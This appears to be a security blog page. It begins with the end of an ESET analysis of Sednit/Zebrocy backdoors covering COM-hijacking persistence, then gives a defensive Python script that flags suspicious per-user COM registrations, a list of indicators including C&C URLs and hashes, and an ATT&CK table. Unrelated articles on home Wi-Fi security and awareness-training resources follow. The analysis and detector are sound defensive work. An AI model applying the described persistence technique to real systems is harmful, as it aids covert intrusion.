There are some interesting facts here. First, the operators use COM object hijacking to make the malware persistent on the system, even though the custom backdoor is installed for only a few hours: the CLSID is registered under HKCU, a per-user hive that can be written without administrative rights (/reg:64 targets the 64-bit registry view), and its InProcServer32 value points to a DLL dropped under %APPDATA%. rundll32.exe then loads that DLL and calls its export at ordinal 1 (the “,#1” syntax). Second, the hex-encoded string passed as the argument is the C&C used by the custom backdoor (687474703A2F2F decodes to “http://”), whereas in the Delphi backdoor the C&C is embedded in the configuration.
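The registry changes above are the pattern a hunt for per-user COM hijacking should look for. As an added example (not ESET’s code), the Python script below parses the text output of reg query HKCU\Software\Classes\CLSID /s /reg:64 and of the same query against HKLM, and flags every InProcServer32 whose server DLL lives in a user-writable location, or whose CLSID also exists under HKLM (in which case the HKCU entry shadows the machine-wide one for that user). Two practitioner caveats are built in: because CMD_EXECUTE runs the command line through cmd.exe, %APPDATA% is expanded before reg.exe stores the value, so the detector accepts both the literal %APPDATA% form and the expanded C:\Users\...\AppData form; and legitimate per-user software (browser updaters, collaboration clients) also registers COM servers under AppData\Local, so the output is a triage list, not a verdict. The reg output shown is constructed; the page does not say whether the Zebrocy CLSID also exists under HKLM, so the shadowing case uses a made-up CLSID, and the benign Program Files entry is made up as well.

```python
"""Triage per-user COM InProcServer32 registrations for hijacking.

Added example, not ESET's code. Input is the text printed by
    reg query HKCU\\Software\\Classes\\CLSID /s /reg:64
and by the same query against HKLM. A CLSID is reported when its in-process
server DLL sits in a user-writable location (the pattern the operators created
in the article) or when the per-user key shadows a machine-wide registration.
The reg output below is constructed for the example.
"""
import re

# Locations an unprivileged user can write to. Both the literal %VAR% form and
# the expanded C:\Users\... form are matched, because cmd.exe expands
# %APPDATA% before reg.exe stores the value.
USER_WRITABLE = re.compile(
    r"^%(APPDATA|LOCALAPPDATA|TEMP|TMP|USERPROFILE)%"
    r"|\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\"
    r"|^C:\\ProgramData\\"
    r"|\\Temp\\",
    re.I,
)
KEY_LINE = re.compile(r"^HKEY_[A-Z_]+\\")
VALUE_LINE = re.compile(r"^\s+(\(Default\)|\S+)\s+(REG_\w+)\s+(.*)$")
CLSID_IN_PATH = re.compile(r"\\CLSID\\(\{[0-9A-F-]{36}\})", re.I)

# Constructed output of: reg query HKCU\Software\Classes\CLSID /s /reg:64
# First CLSID: the registration created by the operators (path expanded by cmd.exe).
# Second CLSID (made up): a benign per-user server in Program Files.
# Third CLSID (made up): a per-user server that shadows the HKLM entry below.
SAMPLE_HKCU = r"""
HKEY_CURRENT_USER\Software\Classes\CLSID\{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}
    (Default)    REG_SZ    Reliability Maintenance Control Panel

HKEY_CURRENT_USER\Software\Classes\CLSID\{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}\InProcServer32
    (Default)    REG_SZ    C:\Users\ivan\AppData\Roaming\Microsoft\WinSupport\RMC\mtrcpl.dll
    ThreadingModel    REG_SZ    Both

HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InProcServer32
    (Default)    REG_SZ    C:\Program Files\Contoso\ctl.dll
    ThreadingModel    REG_SZ    Apartment

HKEY_CURRENT_USER\Software\Classes\CLSID\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}\InProcServer32
    (Default)    REG_SZ    C:\Users\ivan\AppData\Local\Temp\upd.dll
    ThreadingModel    REG_SZ    Both
"""

# Constructed output of: reg query HKLM\Software\Classes\CLSID /s /reg:64
SAMPLE_HKLM = r"""
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}\InProcServer32
    (Default)    REG_SZ    C:\Windows\System32\contoso.dll
    ThreadingModel    REG_SZ    Both
"""


def parse_reg_query(text):
    """Return {key_path: {value_name: data}} from `reg query ... /s` output."""
    keys, current = {}, None
    for line in text.splitlines():
        if KEY_LINE.match(line):
            current = line.strip()
            keys[current] = {}
        elif current is not None:
            m = VALUE_LINE.match(line)
            if m:
                keys[current][m.group(1)] = m.group(3).strip()
    return keys


def inproc_servers(keys):
    """Map CLSID -> (server DLL, ThreadingModel) for every InProcServer32 key."""
    servers = {}
    for path, values in keys.items():
        if not path.upper().endswith("\\INPROCSERVER32"):
            continue
        m = CLSID_IN_PATH.search(path)
        if m:
            servers[m.group(1).upper()] = (values.get("(Default)", ""),
                                           values.get("ThreadingModel", ""))
    return servers


def find_com_hijacks(hkcu_text, hklm_text):
    """Triage list of suspicious per-user COM servers, with the reasons."""
    hkcu = inproc_servers(parse_reg_query(hkcu_text))
    hklm = inproc_servers(parse_reg_query(hklm_text))
    findings = []
    for clsid, (dll, model) in hkcu.items():
        reasons = []
        if USER_WRITABLE.search(dll):
            reasons.append("server DLL in a user-writable path")
        if clsid in hklm:
            reasons.append("shadows the HKLM registration of the same CLSID")
        if reasons:
            findings.append({"clsid": clsid, "dll": dll,
                             "threading": model, "reasons": reasons})
    return findings


def run_sample():
    """Run the triage over the constructed reg output above."""
    return find_com_hijacks(SAMPLE_HKCU, SAMPLE_HKLM)


if __name__ == "__main__":
    for f in run_sample():
        print(f["clsid"], f["dll"], "; ".join(f["reasons"]))
```

On a live host, feed the script the saved output of the two reg query commands (run both with /reg:64 and without it on 64-bit Windows, since the Wow6432Node view is a separate CLSID namespace); for a fleet, the same parser runs over reg exports collected by your EDR or a scheduled script, and each flagged DLL should be hashed and checked before any cleanup, since the operators remove their backdoor within hours.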

The two Delphi backdoors, the common one and the one above, are quite similar but contain these interesting tweaks:

                          Delphi backdoor    Downloaded Delphi backdoor
Delphi compiler version   14.0-15.0          32.0
32/64-bit                 32-bit             64-bit
Configuration location    resource section   no config (C&C is passed as an argument)
Number of commands        5                  3
Encryption algorithm      AES ECB            custom
Lifetime on the computer  a few days         a few hours

Once again, it is not very clear what the purpose of this custom backdoor is. Its detection ratio is definitely lower than that of the “usual” backdoor, and the very short time it spends on the system makes it harder to retrieve. Once the operators have completed their evil deeds, they quickly remove it.

Observing the commands used in the wild by the operators is quite interesting. They gather a considerable amount of information on the compromised target and are not worried about duplicated data, which shows a large gap between the development strategy and what the operators do in practice. Backdoors with custom configuration and modules, on the other hand, are deployed very carefully, which indicates some precautions to avoid ending up in the hands of researchers.

The first set of commands is the same and executed during a very short timeframe, which raises another question: is it automated?

Indicators of Compromise

Distribution URL: http://45.124.132[.]127/DOVIDNIK – (2018).zip
C&C server: http://45.124.132[.]127/action-center/centerforserviceandaction/service-and-action.php

SHA-1                                     ESET detection name
48f8b152b86bed027b9152725505fbf4a24a39fd  Win32/TrojanDownloader.Sednit.CMT
1e9f40ef81176190e1ed9a0659473b2226c53f57  Win32/HackTool.PSWDump.D
bfa26857575c49abb129aac87207f03f2b062e07  Win32/PSW.Agent.OGE

MITRE ATT&CK techniques

Tactic               ID     Name                                           Description
Initial Access       T1192  Spearphishing Link                             Spearphishing emails using a URL-shortener service to trick the victim into clicking on a link to a zip file containing malicious files.
Execution            T1204  User Execution                                 Tricks users into running an executable with an icon that looks like a Microsoft Word document.
                     T1085  Rundll32                                       rundll32.exe has been used to run a new, downloaded, malicious DLL.
                     T1047  Windows Management Instrumentation             WMI commands to gather victim host details.
                     T1053  Scheduled Task                                 Scheduled task to execute malicious binaries.
Persistence          T1060  Registry Run Keys / Startup Folder             Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run used for persistence.
                     T1122  Component Object Model Hijacking               COM hijacking for persistence.
Defense Evasion      T1107  File Deletion                                  Deletes files (binaries and files created) after usage.
                     T1089  Disabling Security Tools                       Kills processes.
Discovery            T1012  Query Registry                                 Registry key enumeration.
                     T1057  Process Discovery                              Lists running processes.
                     T1082  System Information Discovery                   Uses the systeminfo command to gather information about the victim.
                     T1083  File and Directory Discovery                   Uses echo ENV command to list the content of a directory.
Collection           T1005  Data from Local System                         Scans files that match extensions listed in the malware.
                     T1039  Data from Network Shared Drive                 Enumerates remote and local drives and then exfiltrates files matching specific extensions.
                     T1025  Data from Removable Media                      Enumerates remote and local drives and then exfiltrates files matching specific extensions.
                     T1074  Data Staged                                    Creates a file containing the paths of all files to exfiltrate.
                     T1056  Input Capture                                  Keylogger feature.
                     T1113  Screen Capture                                 Screenshot feature.
Exfiltration         T1020  Automated Exfiltration                         Automatically prepares a file with all file paths to retrieve and sends it.
                     T1022  Data Encrypted                                 Data sent are hex-encoded, encrypted with a known algorithm or a custom one.
                     T1041  Exfiltration Over Command and Control Channel  Data are exfiltrated to a C&C server.
Command And Control  T1043  Commonly Used Port                             Downloaders and backdoors use ports 80 or 443 to communicate with the C&C server.
                     T1024  Custom Cryptographic Protocol                  Data sent are hex-encoded, encrypted with AES or a custom algorithm.
                     T1132  Data Encoding                                  Data sent are hex-encoded, encrypted with a known algorithm or a custom one.
                     T1001  Data Obfuscation                               Data sent are hex-encoded, encrypted with a known algorithm or a custom one.
                     T1008  Fallback Channels                              A fallback C&C server is embedded in the configuration.
                     T1079  Multilayer Encryption                          Data sent are hex-encoded, encrypted with a known algorithm or a custom one.
                     T1071  Standard Application Layer Protocol            HTTP and HTTPS are used to communicate.
                     T1032  Standard Cryptographic Protocol                Data sent are hex-encoded, encrypted with a known algorithm or a custom one.

22 May 2019 – 11:30AM

Secure Your Home Wi-Fi Router

Several years ago, creating a cybersecure home was simple; most homes consisted of nothing more than a wireless network and several computers. Today, technology has become far more complex and is integrated into every part of our lives, from mobile devices and gaming consoles to your home thermostat and your refrigerator. Here are four simple steps for creating a cybersecure home.

Your Wireless Network

Almost every home network starts with a wireless (or Wi-Fi) network. This is what enables all your devices to connect to the Internet. Most home wireless networks are controlled by your Internet router or a separate, dedicated wireless access point. They both work the same way: by broadcasting wireless signals. The devices in your house can then connect via these signals. This means securing your wireless network is a key part of protecting your home. We recommend the following steps to secure it:

Change the default administrator password on your Internet router or wireless access point (whichever one is controlling your wireless network). The admin account is what allows you to configure the settings for your wireless network.

Ensure that only people you trust can connect to your wireless network. Do this by enabling strong security. Currently, the best option is the security mechanism called WPA2 (or WPA3, where your router and devices support it). By enabling this, a password is required for people to connect to your home network, and once connected, their online activities are encrypted.

Ensure the password used to connect to your wireless network is strong and that it is different from the admin password. Remember, you only need to enter the password once for each of your devices, as they store and remember the password.

Many wireless networks support what is called a Guest Network. This allows visitors to connect to the Internet, but protects your home network, as they cannot connect to any of the other devices on your home network. If you add a guest network, be sure to enable WPA2 and a unique password for the network.

Not sure how to do these steps? Ask your Internet Service Provider or check their website, check the documentation that came with your Internet router or wireless access point, or refer to their respective website.

Your Devices

The next step is knowing what devices are connected to your wireless home network and making sure all of those devices are secure. This used to be simple when you had just a computer or two. However, almost anything can connect to your home network today, including your smartphones, TVs, gaming consoles, baby monitors, speakers, or perhaps even your car. Once you have identified all the devices on your home network, ensure that each one of them is secure. The best way to do this is ensure you have automatic updating enabled on them wherever possible. Cyber attackers are constantly finding new weaknesses in different devices and operating systems. By enabling automatic updates, your computer and devices are always running the most current software, which makes them much harder for anyone to hack into.

Passwords

The next step is to use a strong, unique password for each of your devices and online accounts. The key words here are strong and unique. Tired of complex passwords that are hard to remember and difficult to type? So are we. Use a passphrase instead. This is a type of password that uses a series of words that is easy to remember, such as “Where is my coffee?” or “sunshine-doughnuts-happy-lost”. The longer your passphrase is, the stronger. A unique password means using a different password for each device and online account. This way, if one password is compromised, all your other accounts and devices are still safe. Can’t remember all those strong, unique passwords? Don’t worry, neither can we. That is why we recommend you use a password manager, which is a special security program that securely stores all your passwords for you in an encrypted, virtual safe.

Finally, enable two-step verification whenever available, especially for your online accounts. Two-step verification is much stronger. It uses your password, but also adds a second step, such as a code sent to your smartphone or an app on your smartphone that generates the code for you. Two-step verification is probably the most important step you can take to protect yourself online, and it’s much easier than you think.

Backups

Sometimes, no matter how careful you are, you may be hacked. If that is the case, often the only way you can recover your personal information is to restore from backup. Make sure you are doing regular backups of any important information and verify that you can restore from them. Most mobile devices support automatic backups to the Cloud. For most computers, you may have to purchase some type of backup software or service, which are relatively low-priced and simple to use.

License

OUCH! newsletter is under the Creative Commons license.  You are free to share / distribute it but may not sell or modify it.

Cybersecurity training and awareness: helpful resources for educators

Free resources for cybersecurity awareness and training are out there – links to many of them are provided here

Cybersecurity training and awareness programs need not break the budget. This article lists free resources that are readily accessible and can help you find ideas, content, and contacts to assist in your efforts.

Of course, as I said last year, such programs “will not guarantee complete cyber safety for companies, but they can go a long way towards making workers more cyber-aware” (see: Cybersecurity training still neglected by many employers). When combined with good policies and controls, security education definitely improves an organization’s resistance to attack.

Over the past 12 months I think I have seen an increase in the number of hands raised when I ask audiences: “Has your employer provided you with any training and education around cybersecurity?” If this is a real trend, not just an anecdotal result of my informal research, then I am encouraged. But to be clear, I am not claiming any personal credit for such a trend – there are many dedicated infosec professionals doing far more than I to advance the worthy cause of security training and awareness.

I was fortunate to meet some of these folks last week at an event called Security Professionals Conference 2019 presented by EDUCAUSE, the nonprofit association that helps higher education “elevate the impact of IT.” I was honored to serve on a panel consisting of myself, Robert Jorgensen, Cybersecurity Program Director and Assistant Professor at Utah Valley University, and Kelvin Coleman, Executive Director of the National Cyber Security Alliance. The panel was titled “Cybersecurity Woke: Effecting Positive Change Through Outreach and Education” and it was skillfully moderated by Bob Turner, the CISO of the University of Wisconsin-Madison.

At the end of the session I promised the audience that I would share – here on WeLiveSecurity – links to the awareness and training resources that I had curated, so that anyone who is interested can easily find them. I hope at least some of these prove to be helpful. If you know of others, please consider adding them in the Discussion section below.

Resources: government and non-profit

A great place to start is the National Cyber Security Alliance or NCSA. This is the US non-profit behind a number of key initiatives over the last ten years, including National Cybersecurity Awareness month and the Stay Safe Online campaigns. You can find a host of resources on their website.

The Office of the Director of National Intelligence is a part of the US federal government that values all forms of security awareness and offers several public domain resources under the program called Know the Risk, Raise Your Shield. This interactive page is one place to start. That is the first in a three-part course described here. There are also posters and some pretty funny videos.

The Department of Health and Human Services has an interesting 60-page interactive PDF available online for cybersecurity training. While it has a departmental focus on Personally Identifiable Information (PII), Protected Health Information (PHI), and Personal Identity Verification (PIV) cards, it is still helpful, and particularly so if your organization has a medical component (e.g. medical school or healthcare clients).

The Center for Cyber Safety and Education is run by (ISC)2, one of the leading cybersecurity non-profits, about which there is more info below.

Resources: outside of government but still free

The Infosec Institute is one of a number of for-profit organizations that offer both paid and free awareness materials, the latter obviously being a great way to introduce people to the organization’s capabilities. Despite a slightly strange name, this “Marine Lowlifes Campaign Kit” is well worth exploring.

SecureWorld puts on security events and provides a portal for curated vendor materials, such as this webinar on phishing, produced by Proofpoint. Another useful webinar is this one on Business Email Compromise from KnowBe4. (And yes, according to REN-ISAC, criminals are targeting higher education institutions with BEC.)

ESET offers a free cybertraining course that I have written about here, and talked about here. You can access it here. (Like the other resources in this section, registration is required, but participants can download a certificate of completion, which helps managers track who has taken the training.)

Resources: community of support

A few years ago I joined something called Peerlyst, which describes itself as a “place where security experts share their knowledge, learn from each other, and build their reputation.” Although it is not a non-profit, a lot of free resources have been posted in its wiki-style website. Here are some that I think may be useful in the current context:

A project to crowdsource a security awareness training checklist

The 9 Security Awareness Training Topics Your Employees Need for 2019! – Emma Woods

The 6 things MSP’s Need To Look Out For When Investing in Security Awareness Training – Emma Woods

A list of open source, free and paid phishing campaign toolkits

Free 15 minutes training video: Threat Landscape – IoT, Cloud, and Mobile

Resources: the power of associations

There are quite a few security-related associations that you may be able to tap for help with your security training and awareness program. Looking for an expert to come speak to your employees or students? Want to connect with other people working on cybersecurity in your sector or in your area? One of the following might have what you’re looking for.

ISACs: these are the Information Sharing and Analysis Centers, non-profits that “provide a central resource for gathering information on cyber threats to critical infrastructure and providing two-way sharing of information between the private and public sector.” There is probably one for your part of the economy. For example, if you are in education, then REN-ISAC is the one you need to know about. This page at the National Council of ISACS will lead you to them all.

Infragard: this is the public-private partnership spearheaded by the FBI and now accessible via 82 chapters around the country. Joining requires vetting, but the benefits are well worth the effort. You can apply here.

ISSA: this is the Information Systems Security Association and it offers you “a network of 10,000 colleagues worldwide to support you in managing technology risk.” There are many chapters around the world.

ISACA: previously known as the Information Systems Audit and Control Association, it serves 140,000 professionals in 180 countries, so there is probably a chapter near you.

(ISC)2: you probably know the International Information System Security Certification Consortium (ISC squared, get it?), from its well-known CISSP qualification, but this educational non-profit membership organization does a lot more than that. Check out the website.

CompTIA: while security is not the sole focus of this non-profit computer trade industry association and certification body, it can be a great source of information about cybersecurity. Consider connecting with the IT Security Community.

21 May 2019 – 05:33PM